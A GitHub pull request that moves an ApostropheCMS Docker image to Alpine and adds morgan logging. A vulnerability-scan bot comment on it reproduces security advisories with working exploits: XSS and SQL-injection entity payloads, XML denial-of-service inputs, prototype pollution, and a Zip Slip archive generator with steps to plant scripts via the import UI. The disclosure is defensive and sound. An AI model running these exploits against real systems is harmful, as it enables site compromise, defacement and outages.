Skip to content

Change image. add debug#259

Merged
a-nomad merged 3 commits intomainfrom
devops/change-image
Mar 19, 2026
Merged

Change image. add debug#259
a-nomad merged 3 commits intomainfrom
devops/change-image

Conversation

@a-nomad
Copy link
Contributor

@a-nomad a-nomad commented Mar 19, 2026

The PR makes two main changes: (1) switches the Docker base image from node:24-slim to node:24-alpine to reduce the container image size, updating user creation commands for Alpine compatibility, and (2) adds request logging functionality using the morgan middleware to the Express configuration with detailed logging including timestamps, HTTP methods, URLs, status codes, and response times.

@coderabbitai
Copy link
Contributor

coderabbitai bot commented Mar 19, 2026

Walkthrough

The pull request switches the Dockerfile base images from node:24-slim to node:24-alpine and updates user/group creation commands to Alpine-compatible syntax using addgroup -S and adduser -S -G appgroup. Concurrently, a new Express middleware hook is added to website/modules/@apostrophecms/express/index.js that integrates request logging via morgan. The morgan package is added to website/package.json dependencies at version ^1.10.0. Build and runtime steps remain functionally unchanged.

Possibly related PRs

  • Change base image #258: Modifies the same Dockerfile base image and user/group creation commands for Alpine compatibility.
🚥 Pre-merge checks | ✅ 2 | ❌ 1

❌ Failed checks (1 inconclusive)

Check name Status Explanation Resolution
Title check ❓ Inconclusive The title 'Change image. add debug' is vague and does not accurately describe the main changes in the pull request, which involve switching to Alpine images, adding Morgan middleware for request logging, and installing the Morgan dependency. Update the title to clearly describe the actual changes, such as 'Switch to Alpine images and add request logging with Morgan' or similar to better reflect the changeset.
✅ Passed checks (2 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Docstring Coverage ✅ Passed No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.

📝 Coding Plan
  • Generate coding plan for human review comments

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

@github-actions
Copy link

github-actions bot commented Mar 19, 2026

🔍 Vulnerabilities of apostrophe-cms:test

📦 Image Reference apostrophe-cms:test
digestsha256:90f6b12d34cfdc6482579c3e179af7200c0061748fc4031365aa52fd16aec134
vulnerabilitiescritical: 5 high: 36 medium: 0 low: 0
platformlinux/amd64
size173 MB
packages975
📦 Base Image node:24-alpine
also known as
  • 24-alpine3.23
  • 24.14-alpine
  • 24.14-alpine3.23
  • 24.14.0-alpine
  • 24.14.0-alpine3.23
  • krypton-alpine
  • krypton-alpine3.23
  • lts-alpine
  • lts-alpine3.23
digestsha256:e9445c64ace1a9b5cdc60fc98dd82d1e5142985d902f41c2407e8fffe49d46a3
vulnerabilitiescritical: 0 high: 6 medium: 2 low: 1
critical: 1 high: 3 medium: 0 low: 0 fast-xml-parser 5.2.0 (npm)

pkg:npm/fast-xml-parser@5.2.0

critical 9.3: CVE--2026--25896 Incorrect Regular Expression

Affected range>=5.0.0
<5.3.5
Fixed version5.3.5
CVSS Score9.3
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N
EPSS Score0.040%
EPSS Percentile12th percentile
Description

Entity encoding bypass via regex injection in DOCTYPE entity names

Summary

A dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (&lt;, &gt;, &amp;, &quot;, &apos;) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered.

Details

The fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed . (period), which is valid in XML names per the W3C spec.

In DocTypeReader.js, entity names are passed directly to RegExp():

entities[entityName] = {
    regx: RegExp(`&${entityName};`, "g"),
    val: val
};

An entity named l. produces the regex /&l.;/g where . matches any character, including the t in &lt;. Since DOCTYPE entities are replaced before built-in entities, this shadows &lt; entirely.

The same issue exists in OrderedObjParser.js:81 (addExternalEntities), and in the v6 codebase - EntitiesParser.js has a validateEntityName function with a character blacklist, but . is not included:

// v6 EntitiesParser.js line 96
const specialChar = "!?\\/[]$%{}^&*()<>|+";  // no dot

Shadowing all 5 built-in entities

Entity name Regex created Shadows
l. /&l.;/g &lt;
g. /&g.;/g &gt;
am. /&am.;/g &amp;
quo. /&quo.;/g &quot;
apo. /&apo.;/g &apos;

PoC

const { XMLParser } = require("fast-xml-parser");

const xml = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY l. "<img src=x onerror=alert(1)>">
]>
<root>
  <text>Hello &lt;b&gt;World&lt;/b&gt;</text>
</root>`;

const result = new XMLParser().parse(xml);
console.log(result.root.text);
// Hello <img src=x onerror=alert(1)>b>World<img src=x onerror=alert(1)>/b>

No special parser options needed - processEntities: true is the default.

When an app renders result.root.text in a page (e.g. innerHTML, template interpolation, SSR), the injected <img onerror> fires.

&amp; can be shadowed too:

const xml2 = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY am. "'; DROP TABLE users;--">
]>
<root>SELECT * FROM t WHERE name='O&amp;Brien'</root>`;

const r = new XMLParser().parse(xml2);
console.log(r.root);
// SELECT * FROM t WHERE name='O'; DROP TABLE users;--Brien'

Impact

This is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.

  • Default config, no special options
  • Attacker can replace any &lt; / &gt; / &amp; / &quot; / &apos; with arbitrary strings
  • Direct XSS vector when parsed XML content is rendered in a page
  • v5 and v6 both affected

Suggested fix

Escape regex metacharacters before constructing the replacement regex:

const escaped = entityName.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
entities[entityName] = {
    regx: RegExp(`&${escaped};`, "g"),
    val: val
};

For v6, add . to the blacklist in validateEntityName:

const specialChar = "!?\\/[].{}^&*()<>|+";

Severity

CWE-185 (Incorrect Regular Expression)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N - 9.3 (CRITICAL)

Entity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.

high 7.5: CVE--2026--33036 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

Affected range>=4.0.0-beta.3
<=5.5.5
Fixed version5.5.6
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Description

Summary

The fix for CVE-2026-26278 added entity expansion limits (maxTotalExpansions, maxExpandedLength, maxEntityCount, maxEntitySize) to prevent XML entity expansion Denial of Service. However, these limits are only enforced for DOCTYPE-defined entities. Numeric character references (&#NNN; and &#xHH;) and standard XML entities (&lt;, &gt;, etc.) are processed through a separate code path that does NOT enforce any expansion limits.

An attacker can use massive numbers of numeric entity references to completely bypass all configured limits, causing excessive memory allocation and CPU consumption.

Affected Versions

fast-xml-parser v5.x through v5.5.3 (and likely v5.5.5 on npm)

Root Cause

In src/xmlparser/OrderedObjParser.js, the replaceEntitiesValue() function has two separate entity replacement loops:

  1. Lines 638-670: DOCTYPE entities — expansion counting with entityExpansionCount and currentExpandedLength tracking. This was the CVE-2026-26278 fix.
  2. Lines 674-677: lastEntities loop — replaces standard entities including num_dec (/&#([0-9]{1,7});/g) and num_hex (/&#x([0-9a-fA-F]{1,6});/g). This loop has NO expansion counting at all.

The numeric entity regex replacements at lines 97-98 are part of lastEntities and go through the uncounted loop, completely bypassing the CVE-2026-26278 fix.

Proof of Concept

const { XMLParser } = require('fast-xml-parser');

// Even with strict explicit limits, numeric entities bypass them
const parser = new XMLParser({
  processEntities: {
    enabled: true,
    maxTotalExpansions: 10,
    maxExpandedLength: 100,
    maxEntityCount: 1,
    maxEntitySize: 10
  }
});

// 100K numeric entity references — should be blocked by maxTotalExpansions=10
const xml = `<root>${'&#65;'.repeat(100000)}</root>`;
const result = parser.parse(xml);

// Output: 500,000 chars — bypasses maxExpandedLength=100 completely
console.log('Output length:', result.root.length);  // 500000
console.log('Expected max:', 100);  // limit was 100

Results:

  • 100K &#65; references → 500,000 char output (5x default maxExpandedLength of 100,000)
  • 1M references → 5,000,000 char output, ~147MB memory consumed
  • Even with maxTotalExpansions=10 and maxExpandedLength=100, 10K references produce 50,000 chars
  • Hex entities (&#x41;) exhibit the same bypass

Impact

Denial of Service — An attacker who can provide XML input to applications using fast-xml-parser can cause:

  • Excessive memory allocation (147MB+ for 1M entity references)
  • CPU consumption during regex replacement
  • Potential process crash via OOM

This is particularly dangerous because the application developer may have explicitly configured strict entity expansion limits believing they are protected, while numeric entities silently bypass all of them.

Suggested Fix

Apply the same entityExpansionCount and currentExpandedLength tracking to the lastEntities loop (lines 674-677) and the HTML entities loop (lines 680-686), similar to how DOCTYPE entities are tracked at lines 638-670.

Workaround

Set htmlEntities:false

high 7.5: CVE--2026--26278 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

Affected range>=5.0.0
<5.3.6
Fixed version5.3.6
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.064%
EPSS Percentile20th percentile
Description

Summary

The XML parser can be forced to do an unlimited amount of entity expansion. With a very small XML input, it’s possible to make the parser spend seconds or even minutes processing a single request, effectively freezing the application.

Details

There is a check in DocTypeReader.js that tries to prevent entity expansion attacks by rejecting entities that reference other entities (it looks for & inside entity values). This does stop classic “Billion Laughs” payloads.

However, it doesn’t stop a much simpler variant.

If you define one large entity that contains only raw text (no & characters) and then reference it many times, the parser will happily expand it every time. There is no limit on how large the expanded result can become, or how many replacements are allowed.

The problem is in replaceEntitiesValue() inside OrderedObjParser.js. It repeatedly runs val.replace() in a loop, without any checks on total output size or execution cost. As the entity grows or the number of references increases, parsing time explodes.

Relevant code:

DocTypeReader.js (lines 28–33): entity registration only checks for &

OrderedObjParser.js (lines 439–458): entity replacement loop with no limits

PoC

const { XMLParser } = require('fast-xml-parser');

const entity = 'A'.repeat(1000);
const refs = '&big;'.repeat(100);
const xml = `<!DOCTYPE foo [<!ENTITY big "${entity}">]><root>${refs}</root>`;

console.time('parse');
new XMLParser().parse(xml); // ~4–8 seconds for ~1.3 KB of XML
console.timeEnd('parse');

// 5,000 chars × 100 refs takes 200+ seconds
// 50,000 chars × 1,000 refs will hang indefinitely

Impact

This is a straightforward denial-of-service issue.

Any service that parses user-supplied XML using the default configuration is vulnerable. Since Node.js runs on a single thread, the moment the parser starts expanding entities, the event loop is blocked. While this is happening, the server can’t handle any other requests.

In testing, a payload of only a few kilobytes was enough to make a simple HTTP server completely unresponsive for several minutes, with all other requests timing out.

Workaround

Avoid using DOCTYPE parsing by processEntities: false option.

high 7.5: CVE--2026--25128 Improper Input Validation

Affected range>=5.0.9
<=5.3.3
Fixed version5.3.4
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.074%
EPSS Percentile22nd percentile
Description

Summary

A RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., &#9999999; or &#xFFFFFF;). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input.

Details

The vulnerability exists in /src/xmlparser/OrderedObjParser.js at lines 44-45:

"num_dec": { regex: /&#([0-9]{1,7});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 10)) },
"num_hex": { regex: /&#x([0-9a-fA-F]{1,6});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 16)) },

The String.fromCodePoint() method throws a RangeError when the code point exceeds the valid Unicode range (0 to 0x10FFFF / 1114111). The regex patterns can capture values far exceeding this:

  • [0-9]{1,7} matches up to 9,999,999
  • [0-9a-fA-F]{1,6} matches up to 0xFFFFFF (16,777,215)

The entity replacement in replaceEntitiesValue() (line 452) has no try-catch:

val = val.replace(entity.regex, entity.val);

This causes the RangeError to propagate uncaught, crashing the parser and any application using it.

PoC

Setup

Create a directory with these files:

poc/
├── package.json
├── server.js

package.json

{ "dependencies": { "fast-xml-parser": "^5.3.3" } }

server.js

const http = require('http');
const { XMLParser } = require('fast-xml-parser');

const parser = new XMLParser({ processEntities: true, htmlEntities: true });

http.createServer((req, res) => {
  if (req.method === 'POST' && req.url === '/parse') {
    let body = '';
    req.on('data', c => body += c);
    req.on('end', () => {
      const result = parser.parse(body);  // No try-catch - will crash!
      res.end(JSON.stringify(result));
    });
  } else {
    res.end('POST /parse with XML body');
  }
}).listen(3000, () => console.log('http://localhost:3000'));

Run

# Setup
npm install

# Terminal 1: Start server
node server.js

# Terminal 2: Send malicious payload (server will crash)
curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0"?><root>&#9999999;</root>' http://localhost:3000/parse

Result

Server crashes with:

RangeError: Invalid code point 9999999

Alternative Payloads

<!-- Hex variant -->
<?xml version="1.0"?><root>&#xFFFFFF;</root>

<!-- In attribute -->
<?xml version="1.0"?><root attr="&#9999999;"/>

Impact

Denial of Service (DoS):* Any application using fast-xml-parser to process untrusted XML input will crash when encountering malformed numeric entities. This affects:

  • API servers accepting XML payloads
  • File processors parsing uploaded XML files
  • Message queues consuming XML messages
  • RSS/Atom feed parsers
  • SOAP/XML-RPC services

A single malicious request is sufficient to crash the entire Node.js process, causing service disruption until manual restart.

critical: 1 high: 2 medium: 0 low: 0 fast-xml-parser 4.5.3 (npm)

pkg:npm/fast-xml-parser@4.5.3

critical 9.3: CVE--2026--25896 Incorrect Regular Expression

Affected range>=4.1.3
<4.5.4
Fixed version5.3.5
CVSS Score9.3
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N
EPSS Score0.040%
EPSS Percentile12th percentile
Description

Entity encoding bypass via regex injection in DOCTYPE entity names

Summary

A dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (&lt;, &gt;, &amp;, &quot;, &apos;) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered.

Details

The fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed . (period), which is valid in XML names per the W3C spec.

In DocTypeReader.js, entity names are passed directly to RegExp():

entities[entityName] = {
    regx: RegExp(`&${entityName};`, "g"),
    val: val
};

An entity named l. produces the regex /&l.;/g where . matches any character, including the t in &lt;. Since DOCTYPE entities are replaced before built-in entities, this shadows &lt; entirely.

The same issue exists in OrderedObjParser.js:81 (addExternalEntities), and in the v6 codebase - EntitiesParser.js has a validateEntityName function with a character blacklist, but . is not included:

// v6 EntitiesParser.js line 96
const specialChar = "!?\\/[]$%{}^&*()<>|+";  // no dot

Shadowing all 5 built-in entities

Entity name Regex created Shadows
l. /&l.;/g &lt;
g. /&g.;/g &gt;
am. /&am.;/g &amp;
quo. /&quo.;/g &quot;
apo. /&apo.;/g &apos;

PoC

const { XMLParser } = require("fast-xml-parser");

const xml = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY l. "<img src=x onerror=alert(1)>">
]>
<root>
  <text>Hello &lt;b&gt;World&lt;/b&gt;</text>
</root>`;

const result = new XMLParser().parse(xml);
console.log(result.root.text);
// Hello <img src=x onerror=alert(1)>b>World<img src=x onerror=alert(1)>/b>

No special parser options needed - processEntities: true is the default.

When an app renders result.root.text in a page (e.g. innerHTML, template interpolation, SSR), the injected <img onerror> fires.

&amp; can be shadowed too:

const xml2 = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY am. "'; DROP TABLE users;--">
]>
<root>SELECT * FROM t WHERE name='O&amp;Brien'</root>`;

const r = new XMLParser().parse(xml2);
console.log(r.root);
// SELECT * FROM t WHERE name='O'; DROP TABLE users;--Brien'

Impact

This is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.

  • Default config, no special options
  • Attacker can replace any &lt; / &gt; / &amp; / &quot; / &apos; with arbitrary strings
  • Direct XSS vector when parsed XML content is rendered in a page
  • v5 and v6 both affected

Suggested fix

Escape regex metacharacters before constructing the replacement regex:

const escaped = entityName.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
entities[entityName] = {
    regx: RegExp(`&${escaped};`, "g"),
    val: val
};

For v6, add . to the blacklist in validateEntityName:

const specialChar = "!?\\/[].{}^&*()<>|+";

Severity

CWE-185 (Incorrect Regular Expression)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N - 9.3 (CRITICAL)

Entity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.

high 7.5: CVE--2026--33036 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

Affected range>=4.0.0-beta.3
<=5.5.5
Fixed version5.5.6
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Description

Summary

The fix for CVE-2026-26278 added entity expansion limits (maxTotalExpansions, maxExpandedLength, maxEntityCount, maxEntitySize) to prevent XML entity expansion Denial of Service. However, these limits are only enforced for DOCTYPE-defined entities. Numeric character references (&#NNN; and &#xHH;) and standard XML entities (&lt;, &gt;, etc.) are processed through a separate code path that does NOT enforce any expansion limits.

An attacker can use massive numbers of numeric entity references to completely bypass all configured limits, causing excessive memory allocation and CPU consumption.

Affected Versions

fast-xml-parser v5.x through v5.5.3 (and likely v5.5.5 on npm)

Root Cause

In src/xmlparser/OrderedObjParser.js, the replaceEntitiesValue() function has two separate entity replacement loops:

  1. Lines 638-670: DOCTYPE entities — expansion counting with entityExpansionCount and currentExpandedLength tracking. This was the CVE-2026-26278 fix.
  2. Lines 674-677: lastEntities loop — replaces standard entities including num_dec (/&#([0-9]{1,7});/g) and num_hex (/&#x([0-9a-fA-F]{1,6});/g). This loop has NO expansion counting at all.

The numeric entity regex replacements at lines 97-98 are part of lastEntities and go through the uncounted loop, completely bypassing the CVE-2026-26278 fix.

Proof of Concept

const { XMLParser } = require('fast-xml-parser');

// Even with strict explicit limits, numeric entities bypass them
const parser = new XMLParser({
  processEntities: {
    enabled: true,
    maxTotalExpansions: 10,
    maxExpandedLength: 100,
    maxEntityCount: 1,
    maxEntitySize: 10
  }
});

// 100K numeric entity references — should be blocked by maxTotalExpansions=10
const xml = `<root>${'&#65;'.repeat(100000)}</root>`;
const result = parser.parse(xml);

// Output: 500,000 chars — bypasses maxExpandedLength=100 completely
console.log('Output length:', result.root.length);  // 500000
console.log('Expected max:', 100);  // limit was 100

Results:

  • 100K &#65; references → 500,000 char output (5x default maxExpandedLength of 100,000)
  • 1M references → 5,000,000 char output, ~147MB memory consumed
  • Even with maxTotalExpansions=10 and maxExpandedLength=100, 10K references produce 50,000 chars
  • Hex entities (&#x41;) exhibit the same bypass

Impact

Denial of Service — An attacker who can provide XML input to applications using fast-xml-parser can cause:

  • Excessive memory allocation (147MB+ for 1M entity references)
  • CPU consumption during regex replacement
  • Potential process crash via OOM

This is particularly dangerous because the application developer may have explicitly configured strict entity expansion limits believing they are protected, while numeric entities silently bypass all of them.

Suggested Fix

Apply the same entityExpansionCount and currentExpandedLength tracking to the lastEntities loop (lines 674-677) and the HTML entities loop (lines 680-686), similar to how DOCTYPE entities are tracked at lines 638-670.

Workaround

Set htmlEntities:false

high 7.5: CVE--2026--26278 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

Affected range>=4.1.3
<4.5.4
Fixed version5.3.6
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.064%
EPSS Percentile20th percentile
Description

Summary

The XML parser can be forced to do an unlimited amount of entity expansion. With a very small XML input, it’s possible to make the parser spend seconds or even minutes processing a single request, effectively freezing the application.

Details

There is a check in DocTypeReader.js that tries to prevent entity expansion attacks by rejecting entities that reference other entities (it looks for & inside entity values). This does stop classic “Billion Laughs” payloads.

However, it doesn’t stop a much simpler variant.

If you define one large entity that contains only raw text (no & characters) and then reference it many times, the parser will happily expand it every time. There is no limit on how large the expanded result can become, or how many replacements are allowed.

The problem is in replaceEntitiesValue() inside OrderedObjParser.js. It repeatedly runs val.replace() in a loop, without any checks on total output size or execution cost. As the entity grows or the number of references increases, parsing time explodes.

Relevant code:

DocTypeReader.js (lines 28–33): entity registration only checks for &

OrderedObjParser.js (lines 439–458): entity replacement loop with no limits

PoC

const { XMLParser } = require('fast-xml-parser');

const entity = 'A'.repeat(1000);
const refs = '&big;'.repeat(100);
const xml = `<!DOCTYPE foo [<!ENTITY big "${entity}">]><root>${refs}</root>`;

console.time('parse');
new XMLParser().parse(xml); // ~4–8 seconds for ~1.3 KB of XML
console.timeEnd('parse');

// 5,000 chars × 100 refs takes 200+ seconds
// 50,000 chars × 1,000 refs will hang indefinitely

Impact

This is a straightforward denial-of-service issue.

Any service that parses user-supplied XML using the default configuration is vulnerable. Since Node.js runs on a single thread, the moment the parser starts expanding entities, the event loop is blocked. While this is happening, the server can’t handle any other requests.

In testing, a payload of only a few kilobytes was enough to make a simple HTTP server completely unresponsive for several minutes, with all other requests timing out.

Workaround

Avoid using DOCTYPE parsing by processEntities: false option.

critical: 1 high: 0 medium: 0 low: 0 swiper 11.2.6 (npm)

pkg:npm/swiper@11.2.6

critical 9.4: CVE--2026--27212 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Affected range>=6.5.1
<12.1.2
Fixed version12.1.2
CVSS Score9.4
CVSS VectorCVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
EPSS Score0.058%
EPSS Percentile18th percentile
Description

Summary

A prototype pollution vulnerability exists in the the npm package swiper (>=6.5.1, < 12.1.2). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input contained a forbidden key, it is still possible to pollute Object.prototype via a crafted input using Array.prototype. The exploit works across Windows and Linux and on Node and Bun runtimes. This issue is fixed in version 12.1.2

Details

The vulnerability resides in line 94 of shared/utils.mjs where indexOf() function is used to check whether user provided input contain forbidden strings.

PoC

Steps to reproduce

  1. Install latest version of swiper using npm install
  2. Run the following code snippet:
var swiper = require('swiper');
Array.prototype.indexOf = () => -1;        
let obj = {};
var malicious_payload = '{"__proto__":{"polluted":"yes"}}';
console.log({}.polluted);
swiper.default.extendDefaults(JSON.parse(malicious_payload));
console.log({}.polluted);  // prints yes -> indicating that the patch was bypassed and prototype pollution occurred

Expected behavior

Prototype pollution should be prevented and {} should not gain new properties.
This should be printed on the console:

undefined
undefined OR throw an Error

Actual behavior

Object.prototype is polluted
This is printed on the console:

undefined 
yes

Impact

This is a prototype pollution vulnerability, which can have severe security implications depending on how swiper is used by downstream applications. Any application that processes attacker-controlled input using this package may be affected.
It could potentially lead to the following problems:

  1. Authentication bypass
  2. Denial of service - Even if an attacker is not able to exploit prototype pollution in swiper, if there is a prototype pollution within the project from other dependencies, modifying global Array.prototype.indexOf property can result in crash when swiper.default.extendDefaults is called because swiper makes use of this global property. This can lead to Denial of Service.
  3. Remote code execution (if polluted property is passed to sinks like eval or child_process)

Related CVEs

CVE-2026-25521
CVE-2026-25047
CVE-2026-26021

critical: 1 high: 0 medium: 0 low: 0 @apostrophecms/import-export 3.2.0 (npm)

pkg:npm/%40apostrophecms/import-export@3.2.0

critical 9.9: CVE--2026--32731 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range<=3.5.2
Fixed version3.5.3
CVSS Score9.9
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Description

Reported: 2026-03-08
Status: patched and released in version 3.5.3 of @apostrophecms/import-export


Product

Field Value
Repository apostrophecms/apostrophe (monorepo)
Affected Package @apostrophecms/import-export
Affected File packages/import-export/lib/formats/gzip.js
Affected Function extract(filepath, exportPath) — lines ~132–157
Minimum Required Permission Global Content Modify (any editor-level user with import access)

Vulnerability Summary

The extract() function in gzip.js constructs file-write paths using:

fs.createWriteStream(path.join(exportPath, header.name))

path.join() does not resolve or sanitise traversal segments such as ../. It concatenates them as-is, meaning a tar entry named ../../evil.js resolves to a path outside the intended extraction directory. No canonical-path check is performed before the write stream is opened.

This is a textbook Zip Slip vulnerability. Any user who has been granted the Global Content Modify permission — a role routinely assigned to content editors and site managers — can upload a crafted .tar.gz file through the standard CMS import UI and write attacker-controlled content to any path the Node.js process can reach on the host filesystem.


Security Impact

This vulnerability provides unauthenticated-equivalent arbitrary file write to any user with content editor permissions. The full impact chain is:

1. Arbitrary File Write

Write any file to any path the Node.js process user can access. Confirmed writable targets in testing:

  • Any path the CMS process has permission to

2. Static Web Directory — Defacement & Malicious Asset Injection

ApostropheCMS serves <project-root>/public/ via Express static middleware:

// packages/apostrophe/modules/@apostrophecms/asset/index.js
express.static(self.apos.rootDir + '/public', self.options.static || {})

A traversal payload targeting public/ makes any uploaded file directly HTTP-accessible:

This enables:

  • Full site defacement
  • Serving phishing pages from the legitimate CMS domain
  • Injecting malicious JavaScript served to all site visitors (stored XSS at scale)

3. Persistent Backdoor / RCE (Post-Restart)

If the traversal targets any .js file loaded by Node.js on startup (e.g., a module index.js, a config file, a routes file), the payload becomes a persistent backdoor that executes with the CMS process privileges on the next server restart. In container/cloud environments, restarts happen automatically on deploy, crash, or health-check failure — meaning the attacker does not need to manually trigger one.

4. Credential and Secret File Overwrite

Overwrite .env, app.config.js, database seed files, or any config file to:

  • Exfiltrate database credentials on next load
  • Redirect authentication to an attacker-controlled backend
  • Disable security controls (rate limiting, MFA, CSRF)

5. Denial of Service

Overwrite any critical application file (package.json, node_modules entries, etc.) with garbage data, rendering the application unbootable.


Required Permission

Global Content Modify — this is a standard editor-level permission routinely granted to content managers, blog editors, and site administrators in typical ApostropheCMS deployments. It is not an administrator-only capability. Any organisation that delegates content editing to non-technical staff is exposed.


Proof of Concept

Two PoC artifacts are provided:

File Purpose
tmp-import-export-zip-slip-poc.js Automated Node.js harness — verifies the write happens without a browser
make-slip-tar.py Attacker tool — generates a real .tar.gz for upload via the CMS web UI

PoC 1 — Automated Verification (tmp-import-export-zip-slip-poc.js)

const fs = require('node:fs');
const fsp = require('node:fs/promises');
const path = require('node:path');
const os = require('node:os');
const zlib = require('node:zlib');
const tar = require('tar-stream');

const gzipFormat = require('./packages/import-export/lib/formats/gzip.js');

async function makeArchive(archivePath) {
  const pack = tar.pack();
  const gzip = zlib.createGzip();
  const out = fs.createWriteStream(archivePath);

  const done = new Promise((resolve, reject) => {
    out.on('finish', resolve);
    out.on('error', reject);
    gzip.on('error', reject);
    pack.on('error', reject);
  });

  pack.pipe(gzip).pipe(out);

  pack.entry({ name: 'aposDocs.json' }, '[]');
  pack.entry({ name: 'aposAttachments.json' }, '[]');

  // Traversal payload
  pack.entry({ name: '../../zip-slip-pwned.txt' }, 'PWNED_FROM_TAR');

  pack.finalize();
  await done;
}

(async () => {
  const base = await fsp.mkdtemp(path.join(os.tmpdir(), 'apos-zip-slip-'));
  const archivePath = path.join(base, 'evil-export.gz');
  const exportPath = archivePath.replace(/\.gz$/, '');

  await makeArchive(archivePath);

  const expectedOutsideWrite = path.resolve(exportPath, '../../zip-slip-pwned.txt');

  // Ensure clean pre-state
  try { await fsp.unlink(expectedOutsideWrite); } catch (_) {}

  await gzipFormat.input(archivePath);

  const exists = fs.existsSync(expectedOutsideWrite);
  const content = exists ? await fsp.readFile(expectedOutsideWrite, 'utf8') : '';

  console.log('EXPORT_PATH:', exportPath);
  console.log('EXPECTED_OUTSIDE_WRITE:', expectedOutsideWrite);
  console.log('ZIP_SLIP_WRITE_HAPPENED:', exists);
  console.log('WRITTEN_CONTENT:', content.trim());
})();

Run:

node .\tmp-import-export-zip-slip-poc.js

Observed output (confirmed):

EXPORT_PATH:            C:\Users\...\AppData\Local\Temp\apos-zip-slip-XXXXXX\evil-export
EXPECTED_OUTSIDE_WRITE: C:\Users\...\AppData\Local\Temp\zip-slip-pwned.txt
ZIP_SLIP_WRITE_HAPPENED: true
WRITTEN_CONTENT:        PWNED_FROM_TAR

The file zip-slip-pwned.txt is written two directories above the extraction root, confirming path traversal.


PoC 2 — Web UI Exploitation (make-slip-tar.py)

Script (make-slip-tar.py):

import tarfile, io, sys

if len(sys.argv) != 3:
    print("Usage: python make-slip-tar.py <payload_file> <target_path>")
    sys.exit(1)

payload_file = sys.argv[1]
target_path  = sys.argv[2]
out = "evil-slip.tar.gz"

with open(payload_file, "rb") as f:
    payload = f.read()

with tarfile.open(out, "w:gz") as t:
    docs = io.BytesIO(b"[]")
    info = tarfile.TarInfo("aposDocs.json")
    info.size = len(docs.getvalue())
    t.addfile(info, docs)

    atts = io.BytesIO(b"[]")
    info = tarfile.TarInfo("aposAttachments.json")
    info.size = len(atts.getvalue())
    t.addfile(info, atts)

    info = tarfile.TarInfo(target_path)
    info.size = len(payload)
    t.addfile(info, io.BytesIO(payload))

print("created", out)

Steps to Reproduce (Web UI — Real Exploitation)

Step 1 — Create the payload file

Create a file with the content you want to write to the server. For a static web directory write:

echo "<!-- injected by attacker --><script>alert('XSS')</script>" > payload.html

Step 2 — Generate the malicious archive

Use the traversal path that reaches the CMS public/ directory. The number of ../ segments depends on where the CMS stores its temporary extraction directory relative to the project root — typically 2–4 levels up. Adjust as needed:

python make-slip-tar.py payload.html "../../../../<project-root>/public/injected.html"

This creates evil-slip.tar.gz containing:

  • aposDocs.json — empty, required by the importer
  • aposAttachments.json — empty, required by the importer
  • ../../../../<project-root>/public/injected.html — the traversal payload

Step 3 — Upload via CMS Import UI

  1. Log in to the CMS with any account that has Global Content Modify permission.
  2. Navigate to Open Global Settings → More Options → Import.
  3. Select evil-slip.tar.gz and click Import.
  4. The CMS accepts the file and begins extraction — no error is shown.

Step 4 — Confirm the write

curl http://localhost:3000/injected.html

Expected response:

<!-- injected by attacker --><script>alert('XSS')</script>

The file is now being served from the CMS's own domain to all visitors.

